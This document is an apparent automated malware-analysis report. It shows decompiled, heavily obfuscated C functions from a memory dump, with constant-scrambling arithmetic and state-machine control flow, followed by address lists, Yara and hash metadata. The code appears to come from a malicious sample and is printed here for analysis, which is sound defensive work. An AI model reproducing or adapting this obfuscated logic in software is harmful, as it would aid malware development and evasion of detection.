				intOrPtr _t449;
				signed int* _t450;
				void* _t452;

				_t450 =  &_v684;
				_v548 = _v548 & 0x00000000;
				_v652 = 0x628b;
				_v652 = _v652 | 0x8ea8a6c3;
				_v652 = _v652 >> 8;
				_v652 = _v652 ^ 0x078a89dd;
				_v652 = _v652 ^ 0x0504213b;
				_v656 = 0xca44;
				_v656 = _v656 << 3;
				_v656 = _v656 >> 0xa;
				_v656 = _v656 | 0x073c6a17;
				_v656 = _v656 ^ 0x073c621f;
				_v664 = 0x16e0;
				_v664 = _v664 + 0xffffe980;
				_v664 = _v664 >> 8;
				_v544 = __edx;
				_t449 = __ecx;
				_t445 = 0x351028fa;
				_t386 = 0x6c;
				_v664 = _v664 / _t386;
				_v664 = _v664 ^ 0x00007066;
				_v640 = 0x836e;
				_v640 = _v640 + 0xb501;
				_v640 = _v640 >> 2;
				_v640 = _v640 ^ 0x000012b9;
				_v628 = 0xb2ec;
				_t387 = 0x41;
				_v628 = _v628 * 0x46;
				_v628 = _v628 + 0xd97;
				_v628 = _v628 ^ 0x0030acaf;
				_v576 = 0x565d;
				_v576 = _v576 | 0xc8c85e8e;
				_v576 = _v576 ^ 0xc8c86b89;
				_v560 = 0xfa05;
				_v560 = _v560 + 0x1743;
				_v560 = _v560 ^ 0x00015cb0;
				_v588 = 0x54a3;
				_v588 = _v588 ^ 0x711a4c60;
				_v588 = _v588 << 6;
				_v588 = _v588 ^ 0x46864cc2;
				_v596 = 0xba14;
				_v596 = _v596 + 0xf2e8;
				_v596 = _v596 + 0x1be7;
				_v596 = _v596 ^ 0x00019f0a;
				_v660 = 0x9a1f;
				_v660 = _v660 / _t387;
				_t388 = 0x56;
				_v660 = _v660 * 0x79;
				_v660 = _v660 << 0xd;
				_v660 = _v660 ^ 0x23dca07a;
				_v676 = 0x17dc;
				_v676 = _v676 << 0xe;
				_v676 = _v676 / _t388;
				_v676 = _v676 + 0xffffccb5;
				_v676 = _v676 ^ 0x0011ad2d;
				_v636 = 0xbd70;
				_v636 = _v636 | 0x80fc5ede;
				_v636 = _v636 << 4;
				_v636 = _v636 ^ 0x0fcfa70d;
				_v608 = 0xbaf8;
				_v608 = _v608 + 0xffff1119;
				_t389 = 0x27;
				_v608 = _v608 / _t389;
				_v608 = _v608 ^ 0x06904b29;
				_v684 = 0xf49f;
				_t390 = 0x66;
				_v684 = _v684 * 0x1f;
				_v684 = _v684 + 0xffffe502;
				_v684 = _v684 / _t390;
				_v684 = _v684 ^ 0x00005c32;
				_v668 = 0xe410;
				_v668 = _v668 >> 0xc;
				_v668 = _v668 + 0xffffc634;
				_v668 = _v668 << 0xf;
				_v668 = _v668 ^ 0xe3216c4d;
				_v620 = 0x7d49;
				_t391 = 0x24;
				_v620 = _v620 * 0x1a;
				_v620 = _v620 ^ 0x980c0cc6;
				_v620 = _v620 ^ 0x9800e7e7;
				_v564 = 0x5c7e;
				_v564 = _v564 ^ 0x14aa654c;
				_v564 = _v564 ^ 0x14aa562a;
				_v552 = 0x450c;
				_v552 = _v552 << 7;
				_v552 = _v552 ^ 0x0022b9f7;
				_v580 = 0x3573;
				_v580 = _v580 >> 0xe;
				_v580 = _v580 / _t391;
				_v580 = _v580 ^ 0x000007cd;
				_v584 = 0x18cc;
				_v584 = _v584 >> 0xe;
				_v584 = _v584 << 3;
				_v584 = _v584 ^ 0x000042dd;
				_v556 = 0x1e9b;
				_v556 = _v556 + 0xffff5daa;
				_v556 = _v556 ^ 0xffff6e35;
				_v568 = 0x1617;
				_v568 = _v568 << 4;
				_v568 = _v568 ^ 0x000112eb;
				_v572 = 0xca92;
				_v572 = _v572 + 0x7b62;
				_v572 = _v572 ^ 0x00017fbb;
				_v592 = 0xd72f;
				_v592 = _v592 | 0xe23ccaf6;
				_v592 = _v592 + 0x7d96;
				_v592 = _v592 ^ 0xe23d11e5;
				_v644 = 0x4340;
				_t392 = 7;
				_v644 = _v644 * 0x73;
				_v644 = _v644 | 0x11b8a473;
				_v644 = _v644 ^ 0x11bec66f;
				_v672 = 0x4860;
				_v672 = _v672 / _t392;
				_v672 = _v672 | 0x7c31fb12;
				_v672 = _v672 ^ 0x5cc3fc4f;
				_v672 = _v672 ^ 0x20f228b2;
				_v680 = 0x617d;
				_v680 = _v680 >> 0xd;
				_v680 = _v680 | 0xd7e9f895;
				_v680 = _v680 ^ 0xd7e9e095;
				_v616 = 0xec2d;
				_v616 = _v616 + 0xebc9;
				_v616 = _v616 ^ 0x6282d746;
				_v616 = _v616 ^ 0x6283789e;
				_v600 = 0x3147;
				_v600 = _v600 >> 0xe;
				_t393 = 0x4c;
				_t383 = _v544;
				_t444 = _v544;
				_v600 = _v600 * 0x6d;
				_v600 = _v600 ^ 0x000035af;
				_v604 = 0xdf1e;
				_v604 = _v604 >> 0xa;
				_v604 = _v604 + 0xffffe311;
				_v604 = _v604 ^ 0xffffd288;
				_v612 = 0xd6ea;
				_v612 = _v612 << 0xc;
				_v612 = _v612 * 0x1c;
				_v612 = _v612 ^ 0x7819f753;
				_v624 = 0x23;
				_v624 = _v624 >> 6;
				_v624 = _v624 ^ 0x0e47f934;
				_v624 = _v624 ^ 0x0e47f086;
				_v632 = 0x3384;
				_v632 = _v632 >> 9;
				_v632 = _v632 / _t393;
				_v632 = _v632 ^ 0x000059c8;
				_v648 = 0x4bab;
				_v648 = _v648 * 0x33;
				_v648 = _v648 ^ 0xea23b576;
				_v648 = _v648 | 0x057acb41;
				_v648 = _v648 ^ 0xef7effc2;
				while(1) {
					L1:
					_t354 = 0x2d3a08fe;
					while(1) {
						L2:
						_t394 = 0x2432fb60;
						do {
							while(1) {
								L3:
								_t452 = _t445 - _t394;
								if(_t452 > 0) {
									break;
								}
								if(_t452 == 0) {
									_push( &_v524);
									_push(_t394);
									_t367 = E0022BB3A(_v684, _v668, _t394, _v548, _v620,  &_v540, _v564);
									_t450 =  &(_t450[7]);
									if(_t367 != 0) {
										E00234F7D(_v552, _v580, _v540);
										E00234F7D(_v584, _v556, _v536);
									}
									_t435 = _v572;
									_push(_v548);
									_t401 = _v568;
									L21:
									E00234F7D(_t401, _t435);
									L22:
									_t445 = 0x2e38c466;
									while(1) {
										L1:
										_t354 = 0x2d3a08fe;
										goto L2;
									}
								} else {
									if(_t445 == 0xd57030c) {
										return E0022F536(_v624, _v632, _v648, _t444);
									}
									if(_t445 == 0x1b7bc3fb) {
										E0022F326();
										E0022F6DF(_t394);
										_t354 = 0x2d3a08fe;
										_t445 = 0x1f6584a2;
										_t383 =  !=  ? 0x2d3a08fe : 0x19ec5bc6;
										goto L2;
									} else {
										if(_t445 == 0x1f6584a2) {
											if(_t383 != _t354) {
												_t445 = 0x1fb1d4b9;
												continue;
											} else {
												_push(_v652);
												_push(_t394);
												_t287 =  &_v676; // 0xe3216c4d
												E002217AC(_v660,  &_v548,  *_t287, _t394);
												_t450 =  &(_t450[5]);
												asm("sbb esi, esi");
												_t445 = (_t445 & 0x125ad1ad) + 0xd57030c;
												while(1) {
													L1:
													_t354 = 0x2d3a08fe;
													L2:
													_t394 = 0x2432fb60;
													goto L3;
												}
											}
										} else {
											if(_t445 != 0x1fb1d4b9) {
												goto L31;
											} else {
												_push( &_v524);
												_push(0x23c910);
												_t378 = E002288E5(_t449, _v544);
												_t354 = 0x2d3a08fe;
												if(_t378 == 0) {
													if(_t383 == 0x2d3a08fe) {
														E00234F7D(_v636, _v608, _v548);
														_t354 = 0x2d3a08fe;
													}
													_t445 = 0xd57030c;
													while(1) {
														L2:
														_t394 = 0x2432fb60;
														goto L3;
													}
												} else {
													_t394 = 0x2432fb60;
													_t445 =  ==  ? 0x2432fb60 : 0x35df9137;
													continue;
												}
											}
										}
									}
								}
								L24:
								if(_t445 != 0x351028fa) {
									if(_t445 != 0x35df9137) {
										goto L31;
									} else {
										_push(_t394);
										_push(_v680);
										_push( &_v524);
										_t312 =  &_v672; // 0x7066
										_push( *_t312);
										_push( &_v540);
										_push(_v644);
										_push(0);
										_t362 = E0022568E(_v592, 0);
										_t450 =  &(_t450[7]);
										if(_t362 == 0) {
											goto L22;
										} else {
											E00234F7D(_v616, _v600, _v540);
											_t435 = _v612;
											_push(_v536);
											_t401 = _v604;
											goto L21;
										}
										goto L28;
									}
									L34:
									return _t359;
								}
								L28:
								_push(_t394);
								_push(_t394);
								_t395 = 0x38;
								_t359 = E00228736(_t395);
								_t444 = _t359;
								if(_t444 != 0) {
									_t445 = 0x1b7bc3fb;
									goto L1;
								}
								goto L34;
							}
							if(_t445 == 0x2e38c466) {
								 *((intOrPtr*)(_t444 + 0x24)) = _t449;
								_t445 = 0xbb47724;
								_t355 =  *0x23ca24; // 0x0
								 *((intOrPtr*)(_t444 + 0x2c)) = _t355;
								_t354 = 0x2d3a08fe;
								 *0x23ca24 = _t444;
								goto L31;
							}
							goto L24;
							L31:
						} while (_t445 != 0xbb47724);
						return _t354;
					}
				}
			}


































































                                              0x00228f78
                                              0x00228f7e
                                              0x00228f86
                                              0x00228f8e
                                              0x00228f96
                                              0x00228f9b
                                              0x00228fa3
                                              0x00228fab
                                              0x00228fb3
                                              0x00228fb8
                                              0x00228fbd
                                              0x00228fc5
                                              0x00228fcd
                                              0x00228fd5
                                              0x00228fdd
                                              0x00228fea
                                              0x00228ff1
                                              0x00228ff7
                                              0x00228ffc
                                              0x00229001
                                              0x00229007
                                              0x0022900f
                                              0x00229017
                                              0x0022901f
                                              0x00229024
                                              0x0022902c
                                              0x00229039
                                              0x0022903c
                                              0x00229040
                                              0x00229048
                                              0x00229050
                                              0x0022905b
                                              0x00229066
                                              0x00229071
                                              0x0022907c
                                              0x00229087
                                              0x00229092
                                              0x0022909a
                                              0x002290a2
                                              0x002290a7
                                              0x002290af
                                              0x002290b7
                                              0x002290bf
                                              0x002290c7
                                              0x002290cf
                                              0x002290df
                                              0x002290e8
                                              0x002290eb
                                              0x002290ef
                                              0x002290f4
                                              0x002290fc
                                              0x00229104
                                              0x0022910f
                                              0x00229113
                                              0x0022911b
                                              0x00229123
                                              0x0022912b
                                              0x00229133
                                              0x00229138
                                              0x00229140
                                              0x00229148
                                              0x00229156
                                              0x0022915b
                                              0x00229161
                                              0x00229169
                                              0x00229176
                                              0x00229179
                                              0x0022917d
                                              0x0022918d
                                              0x00229191
                                              0x00229199
                                              0x002291a1
                                              0x002291a6
                                              0x002291ae
                                              0x002291b3
                                              0x002291bb
                                              0x002291c8
                                              0x002291cb
                                              0x002291cf
                                              0x002291d7
                                              0x002291df
                                              0x002291ea
                                              0x002291f5
                                              0x00229200
                                              0x0022920b
                                              0x00229213
                                              0x0022921e
                                              0x00229226
                                              0x00229233
                                              0x00229237
                                              0x0022923f
                                              0x00229247
                                              0x0022924c
                                              0x00229251
                                              0x00229259
                                              0x00229264
                                              0x0022926f
                                              0x0022927a
                                              0x00229285
                                              0x0022928d
                                              0x00229298
                                              0x002292a3
                                              0x002292ae
                                              0x002292b9
                                              0x002292c1
                                              0x002292c9
                                              0x002292d1
                                              0x002292d9
                                              0x002292e6
                                              0x002292e7
                                              0x002292eb
                                              0x002292f3
                                              0x002292fb
                                              0x00229309
                                              0x0022930d
                                              0x00229315
                                              0x0022931d
                                              0x00229325
                                              0x0022932d
                                              0x00229332
                                              0x0022933a
                                              0x00229342
                                              0x0022934a
                                              0x00229352
                                              0x0022935a
                                              0x00229362
                                              0x0022936a
                                              0x00229378
                                              0x00229379
                                              0x00229380
                                              0x00229387
                                              0x0022938b
                                              0x00229393
                                              0x0022939b
                                              0x002293a0
                                              0x002293a8
                                              0x002293b0
                                              0x002293b8
                                              0x002293c2
                                              0x002293c6
                                              0x002293ce
                                              0x002293d6
                                              0x002293db
                                              0x002293e3
                                              0x002293eb
                                              0x002293f3
                                              0x002293fe
                                              0x00229402
                                              0x0022940a
                                              0x00229417
                                              0x0022941b
                                              0x00229423
                                              0x0022942b
                                              0x00229433
                                              0x00229433
                                              0x00229433
                                              0x00229438
                                              0x00229438
                                              0x00229438
                                              0x0022943d
                                              0x0022943d
                                              0x0022943d
                                              0x0022943d
                                              0x0022943f
                                              0x00000000
                                              0x00000000
                                              0x00229445
                                              0x0022955a
                                              0x0022955b
                                              0x0022957f
                                              0x00229584
                                              0x00229589
                                              0x0022959d
                                              0x002295b5
                                              0x002295ba
                                              0x002295bb
                                              0x002295c2
                                              0x002295c9
                                              0x002295d0
                                              0x002295d0
                                              0x002295d6
                                              0x002295d6
                                              0x00229433
                                              0x00229433
                                              0x00229433
                                              0x00000000
                                              0x00229433
                                              0x0022944b
                                              0x00229451
                                              0x00000000
                                              0x002296c1
                                              0x0022945d
                                              0x0022952e
                                              0x00229535
                                              0x00229541
                                              0x00229546
                                              0x0022954b
                                              0x00000000
                                              0x00229463
                                              0x00229469
                                              0x002294d8
                                              0x00229511
                                              0x00000000
                                              0x002294da
                                              0x002294da
                                              0x002294e5
                                              0x002294e7
                                              0x002294f4
                                              0x002294f9
                                              0x002294fe
                                              0x00229506
                                              0x00229433
                                              0x00229433
                                              0x00229433
                                              0x00229438
                                              0x00229438
                                              0x00000000
                                              0x00229438
                                              0x00229433
                                              0x0022946b
                                              0x00229471
                                              0x00000000
                                              0x00229477
                                              0x00229485
                                              0x00229486
                                              0x0022948d
                                              0x00229495
                                              0x0022949b
                                              0x002294b0
                                              0x002294c1
                                              0x002294c7
                                              0x002294c7
                                              0x002294cc
                                              0x00229438
                                              0x00229438
                                              0x00229438
                                              0x00000000
                                              0x00229438
                                              0x0022949d
                                              0x002294a4
                                              0x002294a9
                                              0x00000000
                                              0x002294a9
                                              0x0022949b
                                              0x00229471
                                              0x00229469
                                              0x0022945d
                                              0x002295ec
                                              0x002295f2
                                              0x002295fa
                                              0x00000000
                                              0x00229600
                                              0x00229600
                                              0x00229601
                                              0x0022960e
                                              0x0022960f
                                              0x0022960f
                                              0x0022961a
                                              0x0022961b
                                              0x00229626
                                              0x00229628
                                              0x0022962d
                                              0x00229632
                                              0x00000000
                                              0x00229634
                                              0x00229643
                                              0x00229648
                                              0x0022964d
                                              0x00229654
                                              0x00000000
                                              0x00229654
                                              0x00000000
                                              0x00229632
                                              0x002296cc
                                              0x002296cc
                                              0x002296cc
                                              0x0022965d
                                              0x00229669
                                              0x0022966a
                                              0x0022966d
                                              0x0022966e
                                              0x00229673
                                              0x00229679
                                              0x0022967b
                                              0x00000000
                                              0x0022967b
                                              0x00000000
                                              0x00229679
                                              0x002295e6
                                              0x00229685
                                              0x00229688
                                              0x0022968d
                                              0x00229692
                                              0x00229695
                                              0x0022969a
                                              0x00000000
                                              0x0022969a
                                              0x00000000
                                              0x002296a0
                                              0x002296a0
                                              0x00000000
                                              0x0022943d
                                              0x00229438

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: #$-$@C$G1$Ml!$]V$`H$b{$fpMl!$s5$}a$~\
                                              • API String ID: 0-964951681
                                              • Opcode ID: c33644122f12c9935ec19366d37bcddb48187bd2052bb5a0ac7438064dfd5e3e
                                              • Instruction ID: 8c9aa4b306ef730fe67dd2ef822d6097e980cae15f2da5443b3a1d4de1dc095c
                                              • Opcode Fuzzy Hash: c33644122f12c9935ec19366d37bcddb48187bd2052bb5a0ac7438064dfd5e3e
                                              • Instruction Fuzzy Hash: B102717150D3819FE368CF65E44AA4BBBF1BBC4708F50891DF199862A0D7B89949CF43
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0022E377, Relevance: 15.3, Strings: 12, Instructions: 321COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 98%
                                              			E0022E377() {
				intOrPtr _t319;
				intOrPtr _t322;
				void* _t325;
				intOrPtr _t326;
				intOrPtr _t327;
				intOrPtr _t329;
				void* _t336;
				intOrPtr* _t368;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				void* _t374;
				intOrPtr* _t376;
				void* _t380;

				 *(_t380 + 0x90) = 0x492ac5;
				 *(_t380 + 0x94) = 0;
				 *((intOrPtr*)(_t380 + 0x98)) = 0;
				_t336 = 0x262df760;
				 *(_t380 + 0x48) = 0xf735;
				 *(_t380 + 0x48) =  *(_t380 + 0x48) << 2;
				 *(_t380 + 0x48) =  *(_t380 + 0x48) | 0x892d06ba;
				 *(_t380 + 0x48) =  *(_t380 + 0x48) ^ 0x892fdeff;
				 *(_t380 + 4) = 0x4aa3;
				 *(_t380 + 4) =  *(_t380 + 4) >> 0xc;
				 *(_t380 + 4) =  *(_t380 + 4) | 0x950899f8;
				 *(_t380 + 4) =  *(_t380 + 4) << 4;
				 *(_t380 + 4) =  *(_t380 + 4) ^ 0x50899fc1;
				 *(_t380 + 0x34) = 0x5ec9;
				 *(_t380 + 0x8c) = 0;
				 *(_t380 + 0x44) =  *(_t380 + 0x34) * 0x1a;
				_t371 = 0x70;
				 *(_t380 + 0x48) =  *(_t380 + 0x44) * 0x3f;
				 *(_t380 + 0x48) =  *(_t380 + 0x48) ^ 0x025e429c;
				 *(_t380 + 0x60) = 0xe88e;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) >> 5;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) + 0xffff58a0;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) ^ 0xffff02fa;
				 *(_t380 + 0x58) = 0xbd5e;
				 *(_t380 + 0x58) =  *(_t380 + 0x58) ^ 0xb084e46b;
				 *(_t380 + 0x58) =  *(_t380 + 0x58) >> 0xe;
				 *(_t380 + 0x58) =  *(_t380 + 0x58) ^ 0x0002e87c;
				 *(_t380 + 0x2c) = 0x606e;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) + 0xffff1c2d;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) + 0x108d;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) * 0x15;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) ^ 0xfff6a15c;
				 *(_t380 + 0x4c) = 0xb86a;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) + 0xd5ca;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) | 0x7ce26820;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) ^ 0x7ce3b1fe;
				 *(_t380 + 0x44) = 0x5cf7;
				 *(_t380 + 0x44) =  *(_t380 + 0x44) | 0x38977032;
				 *(_t380 + 0x44) =  *(_t380 + 0x44) * 0x30;
				 *(_t380 + 0x44) =  *(_t380 + 0x44) ^ 0x9c67384b;
				 *(_t380 + 0x74) = 0xd45b;
				 *(_t380 + 0x74) =  *(_t380 + 0x74) / _t371;
				 *(_t380 + 0x74) =  *(_t380 + 0x74) ^ 0x00004dc6;
				 *(_t380 + 0x14) = 0x87c2;
				 *(_t380 + 0x14) =  *(_t380 + 0x14) + 0xc44a;
				 *(_t380 + 0x14) =  *(_t380 + 0x14) ^ 0x3473056e;
				 *(_t380 + 0x14) =  *(_t380 + 0x14) ^ 0x529657aa;
				 *(_t380 + 0x14) =  *(_t380 + 0x14) ^ 0x66e43592;
				 *(_t380 + 0x6c) = 0x3ddc;
				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) >> 6;
				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) ^ 0x00003a4d;
				 *(_t380 + 0x3c) = 0xc186;
				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) + 0xffff2874;
				_t372 = 0x60;
				 *(_t380 + 0x38) =  *(_t380 + 0x3c) / _t372;
				 *(_t380 + 0x38) =  *(_t380 + 0x38) ^ 0x02aacd93;
				 *(_t380 + 0x94) = 0x420b;
				 *(_t380 + 0x94) =  *(_t380 + 0x94) + 0xffff81cc;
				 *(_t380 + 0x94) =  *(_t380 + 0x94) ^ 0xffffbf2e;
				 *(_t380 + 0x24) = 0x5d05;
				 *(_t380 + 0x24) =  *(_t380 + 0x24) << 7;
				 *(_t380 + 0x24) =  *(_t380 + 0x24) >> 0xf;
				 *(_t380 + 0x24) =  *(_t380 + 0x24) ^ 0x53344f8a;
				 *(_t380 + 0x24) =  *(_t380 + 0x24) ^ 0x53345d77;
				 *(_t380 + 0x78) = 0xceba;
				 *(_t380 + 0x78) =  *(_t380 + 0x78) >> 0x10;
				 *(_t380 + 0x78) =  *(_t380 + 0x78) ^ 0x00002af4;
				 *(_t380 + 0x1c) = 0x6278;
				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) << 0xa;
				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) ^ 0x09bc8c53;
				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) + 0xd5e;
				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) ^ 0x08353d86;
				 *(_t380 + 0x18) = 0x457c;
				 *(_t380 + 0x18) =  *(_t380 + 0x18) ^ 0x1123efff;
				 *(_t380 + 0x18) =  *(_t380 + 0x18) + 0x9050;
				 *(_t380 + 0x18) =  *(_t380 + 0x18) ^ 0x715c45c2;
				 *(_t380 + 0x18) =  *(_t380 + 0x18) ^ 0x607832f2;
				 *(_t380 + 0x4c) = 0x48c4;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) + 0x892d;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) ^ 0x18e86949;
				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) ^ 0x18e8d95b;
				 *(_t380 + 0x64) = 0xb936;
				 *(_t380 + 0x64) =  *(_t380 + 0x64) + 0xd883;
				 *(_t380 + 0x64) =  *(_t380 + 0x64) ^ 0x0001ac1b;
				 *(_t380 + 0x20) = 0xcbd2;
				_t373 = 0x7c;
				 *(_t380 + 0x20) =  *(_t380 + 0x20) * 0x1d;
				 *(_t380 + 0x20) =  *(_t380 + 0x20) / _t373;
				 *(_t380 + 0x20) =  *(_t380 + 0x20) | 0xfc977955;
				 *(_t380 + 0x20) =  *(_t380 + 0x20) ^ 0xfc977dd0;
				 *(_t380 + 0x6c) = 0x94d3;
				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) | 0xdadf67d0;
				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) ^ 0xdadfc8fb;
				 *(_t380 + 0x90) = 0xca42;
				 *(_t380 + 0x90) =  *(_t380 + 0x90) * 0x44;
				 *(_t380 + 0x90) =  *(_t380 + 0x90) ^ 0x0035a538;
				 *(_t380 + 0x3c) = 0x3a85;
				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) | 0x6827828e;
				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) >> 5;
				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) ^ 0x0341637e;
				 *(_t380 + 0x74) = 0xaf39;
				 *(_t380 + 0x74) =  *(_t380 + 0x74) << 0xb;
				 *(_t380 + 0x74) =  *(_t380 + 0x74) ^ 0x0579f034;
				 *(_t380 + 0x84) = 0x7bfe;
				 *(_t380 + 0x84) =  *(_t380 + 0x84) * 0x70;
				 *(_t380 + 0x84) =  *(_t380 + 0x84) ^ 0x0036086b;
				 *(_t380 + 0x88) = 0xbca6;
				 *(_t380 + 0x88) =  *(_t380 + 0x88) + 0xffffd080;
				 *(_t380 + 0x88) =  *(_t380 + 0x88) ^ 0x0000ec3f;
				 *(_t380 + 0x7c) = 0x7bcd;
				 *(_t380 + 0x7c) =  *(_t380 + 0x7c) >> 0xf;
				 *(_t380 + 0x7c) =  *(_t380 + 0x7c) ^ 0x00003bde;
				 *(_t380 + 0x8c) = 0x5f89;
				 *(_t380 + 0x8c) =  *(_t380 + 0x8c) + 0x6fee;
				 *(_t380 + 0x8c) =  *(_t380 + 0x8c) ^ 0x0000a333;
				 *(_t380 + 0x2c) = 0x86b9;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) + 0xffffbf3c;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) >> 5;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) >> 4;
				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) ^ 0x000073b3;
				 *(_t380 + 0x50) = 0x2126;
				 *(_t380 + 0x50) =  *(_t380 + 0x50) ^ 0x2e94f228;
				 *(_t380 + 0x50) =  *(_t380 + 0x50) >> 0xe;
				 *(_t380 + 0x50) =  *(_t380 + 0x50) ^ 0x00008d73;
				 *(_t380 + 0x80) = 0xf6ec;
				 *(_t380 + 0x80) =  *(_t380 + 0x80) * 0x34;
				 *(_t380 + 0x80) =  *(_t380 + 0x80) ^ 0x003277fb;
				 *(_t380 + 0x60) = 0x3ac6;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) * 0x28;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) | 0xd79c8d1c;
				 *(_t380 + 0x60) =  *(_t380 + 0x60) ^ 0xd79df08f;
				 *(_t380 + 0x30) = 0x4848;
				 *(_t380 + 0x30) =  *(_t380 + 0x30) ^ 0x9b476349;
				 *(_t380 + 0x30) =  *(_t380 + 0x30) ^ 0x919ac53c;
				 *(_t380 + 0x30) =  *(_t380 + 0x30) ^ 0x0adda027;
				 *(_t380 + 0x34) = 0xf09c;
				 *(_t380 + 0x34) =  *(_t380 + 0x34) << 0xc;
				_t374 = 0x28650a76;
				_t368 =  *((intOrPtr*)(_t380 + 0x98));
				_t334 =  *((intOrPtr*)(_t380 + 0x98));
				_t378 =  *((intOrPtr*)(_t380 + 0x98));
				 *(_t380 + 0x34) =  *(_t380 + 0x34) * 0x3e;
				 *(_t380 + 0x34) =  *(_t380 + 0x34) ^ 0xa45c8003;
				while(_t336 != 0xd3df7e1) {
					if(_t336 == 0x132cc48f) {
						E0022F536( *(_t380 + 0x34),  *(_t380 + 0x58),  *(_t380 + 0x84), _t368);
						_t336 = 0xd3df7e1;
						continue;
					}
					if(_t336 == 0x159b7bb7) {
						_push(_t336);
						_push(_t336);
						 *((intOrPtr*)(_t380 + 0xa0)) = 0x1000;
						_t368 = E00228736(0x1000);
						__eflags = _t368;
						_t336 =  !=  ? _t374 : 0xd3df7e1;
						continue;
					}
					if(_t336 == 0x18c2a499) {
						_t319 = E0022B566(_t336,  *(_t380 + 0x44) | 0x00000006,  *(_t380 + 0x74),  *((intOrPtr*)(_t380 + 0x68)), 1,  *(_t380 + 0x90), _t336,  *((intOrPtr*)(_t380 + 0x28)),  *(_t380 + 0x7c), 0x2000000,  *(_t380 + 0x44),  *((intOrPtr*)(_t380 + 0x9c)),  *(_t380 + 0x38), _t380 + 0xb0);
						_t334 = _t319;
						_t380 = _t380 + 0x30;
						__eflags = _t319 - 0xffffffff;
						if(__eflags == 0) {
							L29:
							__eflags = 0;
							return 0;
						}
						_t336 = 0x159b7bb7;
						continue;
					}
					if(_t336 == 0x1a0fbde3) {
						E00233E3F(_t336, _t380 + 0xb4, __eflags,  *(_t380 + 0x48),  *((intOrPtr*)(_t380 + 0x5c)));
						_t322 = E002228CE(_t380 + 0xbc,  *(_t380 + 0x60),  *(_t380 + 0x30));
						_t378 = _t322;
						_t380 = _t380 + 0xc;
						_t336 = 0x18c2a499;
						 *((short*)(_t322 - 2)) = 0;
						continue;
					}
					if(_t336 == 0x262df760) {
						_t336 = 0x1a0fbde3;
						continue;
					}
					if(_t336 != _t374) {
						L28:
						__eflags = _t336 - 0x1c26cb40;
						if(__eflags != 0) {
							continue;
						}
						goto L29;
					}
					_t325 = E00236319( *(_t380 + 0x44), _t334,  *((intOrPtr*)(_t380 + 0xc4)),  *(_t380 + 0x74),  *(_t380 + 0x7c),  *(_t380 + 0x84), _t368,  *(_t380 + 0x38), _t336,  *(_t380 + 0x7c), _t336, _t336,  *(_t380 + 0x94), _t380 + 0xac);
					_t380 = _t380 + 0x30;
					if(_t325 == 0) {
						_t326 =  *((intOrPtr*)(_t380 + 0x9c));
						L18:
						__eflags = _t326;
						if(__eflags == 0) {
							_t336 = _t374;
						} else {
							_t327 =  *0x23ca30; // 0x0
							E00238A4B( *(_t380 + 0x90),  *(_t380 + 0x94),  *(_t380 + 0x84),  *((intOrPtr*)(_t327 + 8)),  *(_t380 + 0x8c));
							_t380 = _t380 + 0xc;
							_t336 = 0x132cc48f;
						}
						continue;
					}
					_t376 = _t368;
					while( *((intOrPtr*)(_t376 + 4)) != 4 || E00228624( *(_t380 + 0x44), _t378,  *(_t380 + 0x78), _t376 + 0xc) != 0) {
						_t329 =  *_t376;
						if(_t329 == 0) {
							_t326 =  *((intOrPtr*)(_t380 + 0x9c));
							L17:
							_t374 = 0x28650a76;
							goto L18;
						}
						_t376 = _t376 + _t329;
					}
					_t326 = 1;
					 *((intOrPtr*)(_t380 + 0x9c)) = 1;
					goto L17;
				}
				E00234F7D( *(_t380 + 0x60),  *(_t380 + 0x30), _t334);
				_t336 = 0x1c26cb40;
				goto L28;
			}

















                                              0x0022e37d
                                              0x0022e38a
                                              0x0022e393
                                              0x0022e39a
                                              0x0022e39f
                                              0x0022e3a7
                                              0x0022e3ac
                                              0x0022e3b4
                                              0x0022e3bc
                                              0x0022e3c4
                                              0x0022e3c9
                                              0x0022e3d1
                                              0x0022e3d6
                                              0x0022e3de
                                              0x0022e3e6
                                              0x0022e3f6
                                              0x0022e401
                                              0x0022e404
                                              0x0022e408
                                              0x0022e410
                                              0x0022e418
                                              0x0022e41d
                                              0x0022e425
                                              0x0022e42d
                                              0x0022e435
                                              0x0022e43d
                                              0x0022e442
                                              0x0022e44a
                                              0x0022e452
                                              0x0022e45a
                                              0x0022e467
                                              0x0022e46b
                                              0x0022e473
                                              0x0022e47b
                                              0x0022e483
                                              0x0022e48b
                                              0x0022e493
                                              0x0022e49b
                                              0x0022e4a8
